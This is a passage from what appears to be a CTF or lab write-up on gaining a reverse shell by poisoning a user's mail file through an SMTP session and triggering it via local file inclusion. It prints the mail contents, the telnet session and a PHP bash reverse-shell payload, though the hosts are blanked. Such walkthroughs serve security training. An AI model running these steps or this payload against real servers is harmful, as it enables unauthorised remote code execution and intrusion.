Mail log

Example from

Since this server has a port 25 SMTP running we can take advantage of of this feature to see if we can "poison" the /var/mail*user* mail. In order for this attack to succeed, application we are exploiting with LFI needs to have an access to this file. In this we can see below that we can read mail of the user asterisk.

└──╼ $curl -k
From asterisk@beep.localdomain Mon Jan 28 21:04:02 2019
Return-Path: <asterisk@beep.localdomain>
X-Original-To: asterisk
Delivered-To: asterisk@beep.localdomain
Received: by beep.localdomain (Postfix, from userid 100)
id 1BBB2D9301; Mon, 28 Jan 2019 21:04:02 +0200 (EET)
From: root@beep.localdomain (Cron Daemon)
To: asterisk@beep.localdomain
Subject: Cron <asterisk@beep> /var/lib/asterisk/bin/freepbx-cron-scheduler.php
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/var/lib/asterisk>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=asterisk>
X-Cron-Env: <USER=asterisk>
Message-Id: <20190128190402.1BBB2D9301@beep.localdomain>
Date: Mon, 28 Jan 2019 21:02:01 +0200 (EET)
Mon, 28 Jan 2019 21:02:01 +0200 - Got event.. fullybooted
Mon, 28 Jan 2019 21:02:01 +0200 - No event handler for event 'fullybooted'
From asterisk@beep.localdomain Tue Jan 29 21:04:01 2019
Return-Path: <asterisk@beep.localdomain>
X-Original-To: asterisk
Delivered-To: asterisk@beep.localdomain

By connecting to SMTP server we can also send a php code with the hopes of the server executing it. In this case we have send the mail to the user asterisk, with the body containing instructions for reverse shell:

└──╼ $telnet 25
Connected to
Escape character is '^]'.
220 beep.localdomain ESMTP Postfix
250-SIZE 10240000
250 DSN
mail from:
250 2.1.0 Ok
rcpt to: asterisk@localhost
250 2.1.5 Ok
354 End data with <CR><LF>.<CR><LF>
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");?>
250 2.0.0 Ok: queued as 399A4D9301
221 2.0.0 Bye
Connection closed by foreign host.

Since the mail has been sent, all we need to do to test out our theory is to send GET request once again to the below address to trigger the shell: ( if successful the GET request will hang )

curl -k

Successful reverse shell through Apache log poisoning: